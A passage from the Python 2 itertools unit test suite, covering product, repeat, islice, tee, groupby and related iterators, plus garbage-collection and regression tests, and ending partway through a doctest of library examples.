(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
pools = map(tuple, args) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = map(tuple, args) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', xrange(0), xrange(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@test_support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(list(repeat(object='a', times=0)), [])
self.assertEqual(list(repeat(object='a', times=-1)), [])
self.assertEqual(list(repeat(object='a', times=-2)), [])
self.assertEqual(zip(xrange(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
def test_imap(self):
self.assertEqual(list(imap(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(imap(None, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(imap(None, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,imap(None, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(imap(operator.pow, [])), [])
self.assertRaises(TypeError, imap)
self.assertRaises(TypeError, imap, operator.neg)
self.assertRaises(TypeError, imap(10, range(5)).next)
self.assertRaises(ValueError, imap(errfunc, [4], [5]).next)
self.assertRaises(TypeError, imap(onearg, [4], [5]).next)
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, izip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, starmap(10, [(4,5)]).next)
self.assertRaises(ValueError, starmap(errfunc, [(4,5)]).next)
self.assertRaises(TypeError, starmap(onearg, [(4,5)]).next)
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(xrange(100), *args)), range(*args))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(xrange(100), *args)), range(*tgtargs))
# Test stop=None
self.assertEqual(list(islice(xrange(10), None)), range(10))
self.assertEqual(list(islice(xrange(10), None, None)), range(10))
self.assertEqual(list(islice(xrange(10), None, None, None)), range(10))
self.assertEqual(list(islice(xrange(10), 2, None)), range(2, 10))
self.assertEqual(list(islice(xrange(10), 1, None, 2)), range(1, 10, 2))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), range(3))
self.assertEqual(list(it), range(3, 10))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), range(3, 10))
# Test invalid arguments
self.assertRaises(TypeError, islice, xrange(10))
self.assertRaises(TypeError, islice, xrange(10), 1, 2, 3, 4)
self.assertRaises(ValueError, islice, xrange(10), -5, 10, 1)
self.assertRaises(ValueError, islice, xrange(10), 1, -5, -1)
self.assertRaises(ValueError, islice, xrange(10), 1, 10, -1)
self.assertRaises(ValueError, islice, xrange(10), 1, 10, 0)
self.assertRaises((ValueError, TypeError), islice, xrange(10), 'a')
self.assertRaises((ValueError, TypeError), islice, xrange(10), 'a', 1)
self.assertRaises((ValueError, TypeError), islice, xrange(10), 1, 'a')
self.assertRaises((ValueError, TypeError), islice, xrange(10), 'a', 1, 1)
self.assertRaises((ValueError, TypeError), islice, xrange(10), 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: Less islice in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
test_support.gc_collect()
self.assertIsNone(wr())
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
underten = lambda x: x<10
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, takewhile(10, [(4,5)]).next)
self.assertRaises(ValueError, takewhile(errfunc, [(4,5)]).next)
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, t.next)
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
underten = lambda x: x<10
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, dropwhile(10, [(4,5)]).next)
self.assertRaises(ValueError, dropwhile(errfunc, [(4,5)]).next)
def test_tee(self):
n = 200
def irange(n):
for i in xrange(n):
yield i
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(zip(a,b), zip(range(n),range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), range(n))
self.assertEqual(list(b), range(n))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in xrange(100):
self.assertEqual(a.next(), i)
del a
self.assertEqual(list(b), range(n))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in xrange(100):
self.assertEqual(a.next(), i)
del b
self.assertEqual(list(a), range(100, n))
for j in xrange(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = its[i].next()
lists[i].append(value)
self.assertEqual(lists[0], range(n))
self.assertEqual(lists[1], range(n))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
if test_support.check_impl_detail():
# XXX I (arigo) would argue that 'type(a)(iterable)' has
# ill-defined semantics: it always return a fresh tee object,
# but depending on whether 'iterable' is itself a tee object
# or not, it is ok or not to continue using 'iterable' after
# the call. I cannot imagine why 'type(a)(non_tee_object)'
# would be useful, as 'iter(non_tee_obect)' is equivalent
# as far as I can see.
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(xrange(2000), 3)
for i in xrange(100):
self.assertEqual(a.next(), i)
self.assertEqual(list(b), range(2000))
self.assertEqual([c.next(), c.next()], range(2))
self.assertEqual(list(a), range(100,2000))
self.assertEqual(list(c), range(2,2000))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in xrange(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual(map(list, result), [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weak referencable
a, b = tee(xrange(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
test_support.gc_collect()
self.assertRaises(ReferenceError, getattr, p, '__class__')
# Issue 13454: Crash when deleting backward iterator from tee()
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def next(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegexp(RuntimeError, "tee"):
next(a)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def next(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegexp(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, izip().next)
for f in (chain, cycle, izip, groupby):
self.assertRaises(StopIteration, f([]).next)
self.assertRaises(StopIteration, f(StopNow()).next)
self.assertRaises(StopIteration, islice([], None).next)
self.assertRaises(StopIteration, islice(StopNow(), None).next)
p, q = tee([])
self.assertRaises(StopIteration, p.next)
self.assertRaises(StopIteration, q.next)
p, q = tee(StopNow())
self.assertRaises(StopIteration, p.next)
self.assertRaises(StopIteration, q.next)
self.assertRaises(StopIteration, repeat(None, 0).next)
for f in (ifilter, ifilterfalse, imap, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, f(lambda x:x, []).next)
self.assertRaises(StopIteration, f(lambda x:x, StopNow()).next)
class TestExamples(unittest.TestCase):
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_ifilter(self):
self.assertEqual(list(ifilter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_ifilterfalse(self):
self.assertEqual(list(ifilterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_imap(self):
self.assertEqual(list(imap(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_izip(self):
self.assertEqual(list(izip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_izip_longest(self):
self.assertEqual(list(izip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split()))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split()))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
def test_stapmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxint, s.step or 1
it = iter(xrange(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in izip(xrange(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in izip(xrange(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(xrange(10))
self.assertEqual(list(self.islice(it, 3)), range(3))
self.assertEqual(list(it), range(3, 10))
it = iter(xrange(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), range(3, 10))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
iterator.next()
del container, iterator
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(xrange(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_ifilter(self):
a = []
self.makecycle(ifilter(lambda x:True, [a]*2), a)
def test_ifilterfalse(self):
a = []
self.makecycle(ifilterfalse(lambda x:False, a), a)
def test_izip(self):
a = []
self.makecycle(izip([a]*2, [a]*3), a)
def test_izip_longest(self):
a = []
self.makecycle(izip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(izip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_imap(self):
a = []
self.makecycle(imap(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def next(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(imap(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, list, compress(N(s), repeat(1)))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, list, cycle(N(s)))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, list, groupby(N(s)))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_ifilter(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(ifilter(isEven, g(s))), filter(isEven, g(s)))
self.assertRaises(TypeError, ifilter, isEven, X(s))
self.assertRaises(TypeError, list, ifilter(isEven, N(s)))
self.assertRaises(ZeroDivisionError, list, ifilter(isEven, E(s)))
def test_ifilterfalse(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(ifilterfalse(isEven, g(s))), filter(isOdd, g(s)))
self.assertRaises(TypeError, ifilterfalse, isEven, X(s))
self.assertRaises(TypeError, list, ifilterfalse(isEven, N(s)))
self.assertRaises(ZeroDivisionError, list, ifilterfalse(isEven, E(s)))
def test_izip(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(izip(g(s))), zip(g(s)))
self.assertEqual(list(izip(g(s), g(s))), zip(g(s), g(s)))
self.assertRaises(TypeError, izip, X(s))
self.assertRaises(TypeError, list, izip(N(s)))
self.assertRaises(ZeroDivisionError, list, izip(E(s)))
def test_iziplongest(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(izip_longest(g(s))), zip(g(s)))
self.assertEqual(list(izip_longest(g(s), g(s))), zip(g(s), g(s)))
self.assertRaises(TypeError, izip_longest, X(s))
self.assertRaises(TypeError, list, izip_longest(N(s)))
self.assertRaises(ZeroDivisionError, list, izip_longest(E(s)))
def test_imap(self):
for s in (range(10), range(0), range(100), (7,11), xrange(20,50,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(imap(onearg, g(s))), map(onearg, g(s)))
self.assertEqual(list(imap(operator.pow, g(s), g(s))), map(operator.pow, g(s), g(s)))
self.assertRaises(TypeError, imap, onearg, X(s))
self.assertRaises(TypeError, list, imap(onearg, N(s)))
self.assertRaises(ZeroDivisionError, list, imap(onearg, E(s)))
def test_islice(self):
for s in ("12345", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(islice(g(s),1,None,2)), list(g(s))[1::2])
self.assertRaises(TypeError, islice, X(s), 10)
self.assertRaises(TypeError, list, islice(N(s), 10))
self.assertRaises(ZeroDivisionError, list, islice(E(s), 10))
def test_starmap(self):
for s in (range(10), range(0), range(100), (7,11), xrange(20,50,5)):
for g in (G, I, Ig, S, L, R):
ss = zip(s, s)
self.assertEqual(list(starmap(operator.pow, g(ss))), map(operator.pow, g(s), g(s)))
self.assertRaises(TypeError, starmap, operator.pow, X(ss))
self.assertRaises(TypeError, list, starmap(operator.pow, N(ss)))
self.assertRaises(ZeroDivisionError, list, starmap(operator.pow, E(ss)))
def test_takewhile(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not isEven(elem): break
tgt.append(elem)
self.assertEqual(list(takewhile(isEven, g(s))), tgt)
self.assertRaises(TypeError, takewhile, isEven, X(s))
self.assertRaises(TypeError, list, takewhile(isEven, N(s)))
self.assertRaises(ZeroDivisionError, list, takewhile(isEven, E(s)))
def test_dropwhile(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgt = []
for elem in g(s):
if not tgt and isOdd(elem): continue
tgt.append(elem)
self.assertEqual(list(dropwhile(isOdd, g(s))), tgt)
self.assertRaises(TypeError, dropwhile, isOdd, X(s))
self.assertRaises(TypeError, list, dropwhile(isOdd, N(s)))
self.assertRaises(ZeroDivisionError, list, dropwhile(isOdd, E(s)))
def test_tee(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
it1, it2 = tee(g(s))
self.assertEqual(list(it1), list(g(s)))
self.assertEqual(list(it2), list(g(s)))
self.assertRaises(TypeError, tee, X(s))
self.assertRaises(TypeError, list, tee(N(s))[0])
self.assertRaises(ZeroDivisionError, list, tee(E(s))[0])
class LengthTransparency(unittest.TestCase):
@test_support.impl_detail("__length_hint__() API is undocumented")
def test_repeat(self):
from test.test_iterlen import len
self.assertEqual(len(repeat(None, 50)), 50)
self.assertRaises(TypeError, len, repeat(None))
class RegressionTests(unittest.TestCase):
def test_sf_793826(self):
# Fix Armin Rigo's successful efforts to wreak havoc
def mutatingtuple(tuple1, f, tuple2):
# this builds a tuple t which is a copy of tuple1,
# then calls f(t), then mutates t to be equal to tuple2
# (needs len(tuple1) == len(tuple2)).
def g(value, first=[1]):
if first:
del first[:]
f(z.next())
return value
items = list(tuple2)
items[1:1] = list(tuple1)
gen = imap(g, items)
z = izip(*[gen]*len(tuple1))
z.next()
def f(t):
global T
T = t
first[:] = list(T)
first = []
mutatingtuple((1,2,3), f, (4,5,6))
second = list(T)
self.assertEqual(first, second)
def test_sf_950057(self):
# Make sure that chain() and cycle() catch exceptions immediately
# rather than when shifting between input sources
def gen1():
hist.append(0)
yield 1
hist.append(1)
raise AssertionError
hist.append(2)
def gen2(x):
hist.append(3)
yield 2
hist.append(4)
if x:
raise StopIteration
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(False)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, chain(gen1(), gen2(True)))
self.assertEqual(hist, [0,1])
hist = []
self.assertRaises(AssertionError, list, cycle(gen1()))
self.assertEqual(hist, [0,1])
def test_long_chain_of_empty_iterables(self):
# Make sure itertools.chain doesn't run into recursion limits when
# dealing with long chains of empty iterables. Even with a high
# number this would probably only fail in Py_DEBUG mode.
it = chain.from_iterable(() for unused in xrange(10000000))
with self.assertRaises(StopIteration):
next(it)
def test_issue30347_1(self):
def f(n):
if n == 5:
list(b)
return n != 6
for (k, b) in groupby(range(10), f):
list(b) # shouldn't crash
def test_issue30347_2(self):
class K(object):
i = 0
def __init__(self, v):
pass
def __eq__(self, other):
K.i += 1
if K.i == 1:
next(g, None)
return True
def __hash__(self):
return 1
g = next(groupby(range(10), K))[1]
for j in range(2):
next(g, None) # shouldn't crash
class SubclassWithKwargsTest(unittest.TestCase):
def test_keywords_in_subclass(self):
# count is not subclassable...
for cls in (repeat, izip, ifilter, ifilterfalse, chain, imap,
starmap, islice, takewhile, dropwhile, cycle, compress):
class Subclass(cls):
def __init__(self, newarg=None, *args):
cls.__init__(self, *args)
try:
Subclass(newarg=1)
except TypeError, err:
# we expect type errors because of wrong argument count
self.assertNotIn("does not take keyword arguments", err.args[0])
libreftest = """ Doctest for examples in the library reference: libitertools.tex
>>> amounts = [120.15, 764.05, 823.14]
>>> for checknum, amount in izip(count(1200), amounts):
... print 'Check %d is for $%.2f' % (checknum, amount)
...
Check 1200 is for $120.15
Check 1201 is for $764.05
Check 1202 is for $823.14
>>> import operator
>>> for cube in imap(operator.pow, xrange(1,4), repeat(3)):
... print cube
...
1
8
27
>>> reportlines = ['EuroPython', 'Roster', '', 'alex', '', 'laura', '', 'martin', '', 'walter', '', 'samuele']
>>> for name in islice(reportlines, 3, None, 2):
... print name.title()
...
Alex
Laura
Martin
Walter
Samuele
>>> from operator import itemgetter
>>> d = dict(a=1, b=2, c=1, d=2, e=1, f=2, g=3)
>>> di = sorted(sorted(d.iteritems()), key=itemgetter(1))
>>> for k, g in groupby(di, itemgetter(1)):
... print k, map(itemgetter(0), g)
...
1 ['a', 'c', 'e']
2 ['b', 'd', 'f']
3 ['g']
# Find runs of consecutive numbers using groupby. The key to the solution
# is differencing with a range so that consecutive numbers all appear in
# same group.
>>> data = [ 1, 4,5,6, 10, 15,16,17,18, 22, 25,26,27,28]
>>> for k, g in groupby(enumerate(data), lambda t:t[0]-t[1]):
... print map(operator.itemgetter(1), g)
...
[1]
[4, 5, 6]
[10]
[15, 16, 17, 18]
[22]
[25, 26, 27, 28]
>>> def take(n, iterable):
... "Return first n items of the iterable as a list"
... return list(islice(iterable, n))
>>> def enumerate(iterable, start=0):
... return izip(count(start), iterable)
>>> def tabulate(function, start=0):
... "Return function(0), function(1), ..."
... return imap(function, count(start))
>>> import collections
>>> def consume(iterator, n=None):
